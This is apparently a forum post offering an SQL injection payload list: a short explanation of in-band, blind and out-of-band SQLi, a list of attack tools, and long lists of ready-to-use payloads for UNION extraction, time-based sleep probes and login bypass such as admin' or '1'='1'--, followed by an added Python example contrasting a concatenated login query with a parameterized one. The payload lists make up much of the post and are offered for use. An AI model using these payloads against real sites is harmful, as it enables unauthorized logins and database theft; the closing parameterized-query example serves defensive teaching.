SQL injection payload list

Rontribbiani

SQL injection is a web security vulnerability that allows an attacker to interfere with queries an application makes to its database. It often allows attackers to see data they wouldn't normally have access to. This includes data belonging to the user or any other data accessible to the application itself. In many cases, an attacker can modify or delete this data, causing persistent changes to the content or behavior of the application.

Types of SQL injection:
In-band SQLi (Classic SQLi): In-band SQLi is the most popular and easiest to exploit SQL injection attack method. In-band SQL injection occurs when an attacker can use the same communication channel to launch an attack and collect the results. The two most common types of SQL injection are error-based SQLi and union-based SQLi.
Error-based SQLi: Error-based SQLi is an in-band SQL technology that relies on error messages issued by the database server to obtain information about the database structure. In some cases, error-based SQL injection alone is enough to allow an attacker to enumerate an entire database.
Union-based SQLi: Union-based SQLi is an in-band SQL injection technique that uses the SQL UNION operator to combine the results of two or more SELECT statements into a single result that is then returned as part of the HTTP response.
SQLi Inference (Blind SQLi): Unlike in-band SQL, SQLi inference may take longer for an attacker to exploit; however, it is just as dangerous as any other form of SQL injection. In a SQLi inference attack, no data is actually transferred through the web application, and the attacker will not be able to see the results of the in-band attack (which is why this type of attack is often called a "blind SQL injection attack"). Instead, the attacker can send the payload and observe the response of the web application and the output of the database server to reconstruct the database structure. The two types of inference SQL injection are blind Boolean-based SQLi and blind time-based SQLi.
Boolean-based (content-based) blind SQLi: Boolean-based SQL injection is a speculative SQL injection technique based on sending a SQL query to the database, forcing the application to return different results depending on whether the query returns TRUE or FALSE. Depending on the result, the content in the HTTP response will change or remain unchanged. This allows an attacker to infer whether the payload used returns true or false, even if no data from the database is returned.
Time-based blind SQLi: Time-based SQL injection is a speculative SQL injection technique based on sending a SQL query to the database, forcing the database to wait for a specific amount of time (in seconds) before responding. The response time will tell the attacker whether the query result is TRUE or FALSE. Depending on the result, the HTTP response will be returned delayed or immediately. This allows an attacker to infer whether the payload used returns true or false, even if no data from the database is returned.
Out-of-band SQLi: Out-of-band SQL injection is uncommon, mainly because it depends on features enabled on the database server used by the web application. Out-of-band SQL injection occurs when an attacker is unable to use the same channel to launch an attack and collect the results. Out-of-band techniques provide attackers with an alternative to inference time-based techniques, especially if the server response is not very stable (inference time-based attacks are unreliable).
Audio-based SQL injection: This is a SQL injection attack method that can be applied to applications that use voice commands to provide database access. An attacker can obtain information from the database by sending a SQL query with audio.

SQL injection vulnerability scanning tool:
SQLMap – Automatic SQL injection and database scanning tool
jSQL Injection – Java tool for automatic SQL injection
BBQSQL – Blind SQL Injection Vulnerability
NoSQLMap – Automatic retrieval of NoSQL databases
Whitewidow – SQL vulnerability scanner
DSSS – Small SQLi Vulnerability Scanner
explore – Web vulnerability testing format
Blind-Sql-Bitshifting – Blind SQL injection via Bitshifting
Leviathan – Extensive quality testing toolkit
Blisqy – Exploiting time-based blind SQL injection in HTTP headers (MySQL/MariaDB)

Generic SQL injection payload
Code:
'
''
`
``
,
"
""
/
//
\
\\
;
' or "
-- or #
' OR '1
' OR 1 -- -
" OR "" = "
" OR 1 = 1 -- -
' OR '' = '
'='
'LIKE'
'=0--+
 OR 1=1
' OR 'x'='x
' AND id IS NULL; --
'''''''''''''UNION SELECT '2
%00
/*…*/
+        addition, concatenate (or space in url)
||        (double pipe) concatenate
%        wildcard attribute indicator
@variable    local variable
@@variable    global variable
# Numeric
AND 1
AND 0
AND true
AND false
1-false
1-true
1*56
-2
1' ORDER BY 1--+
1' ORDER BY 2--+
1' ORDER BY 3--+
1' ORDER BY 1,2--+
1' ORDER BY 1,2,3--+
1' GROUP BY 1,2,--+
1' GROUP BY 1,2,3--+
' GROUP BY columnnames having 1=1 --
-1' UNION SELECT 1,2,3--+
' UNION SELECT sum(columnname ) from tablename --
-1 UNION SELECT 1 INTO @,@
-1 UNION SELECT 1 INTO @,@,@
1 AND (SELECT * FROM Users) = 1   
' AND MID(VERSION(),1,1) = '5';
' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') --
Finding the table name
Time-Based:
,(select * from (select(sleep(10)))a)
%2c(select%20*%20from%20(select(sleep(10)))a)
';WAITFOR DELAY '0:0:30'--
Comments:
#        Hash comment
/*      C-style comment
-- -    SQL comment
;%00    Nullbyte
`        Backtick

Payload SQL injection bypass
Code:
'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
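
Added example, not part of the original post: a login check written with string concatenation beside the same check using bound parameters, run against four inputs taken from the lists above. The table layout, function names and the SQLite in-memory database are assumptions made for the illustration, and it covers only the in-band case.

```python
import sqlite3

def make_db():
    """Constructed sample data: one account in an in-memory SQLite database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, pw_hash TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'constructed-hash')")
    return db

def _outcome(db, sql, params=()):
    try:
        return "granted" if db.execute(sql, params).fetchone() else "denied"
    except sqlite3.Error:
        # Malformed SQL reaching the engine is the condition error-based SQLi relies on.
        return "sql-error"

def login_concat(db, name, pw_hash):
    """Vulnerable: input is spliced into the statement text."""
    return _outcome(db, "SELECT name FROM users WHERE name = '" + name +
                        "' AND pw_hash = '" + pw_hash + "'")

def login_param(db, name, pw_hash):
    """Hardened: placeholders bind input as values, never as SQL syntax."""
    return _outcome(db, "SELECT name FROM users WHERE name = ? AND pw_hash = ?",
                    (name, pw_hash))

# Inputs copied from the lists in the post; the password supplied is always wrong.
PAYLOADS = ["'", "admin' --", "admin' or '1'='1'--", "' OR 1 -- -"]

def compare(payloads=PAYLOADS):
    db = make_db()
    return {p: (login_concat(db, p, "wrong"), login_param(db, p, "wrong"))
            for p in payloads}

if __name__ == "__main__":
    for payload, (concat, param) in compare().items():
        print(f"{payload!r:24} concatenated={concat:9} parameterized={param}")
```

With bound parameters every input is compared as a literal user name, so none of them matches a row and the statement text never changes.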
 
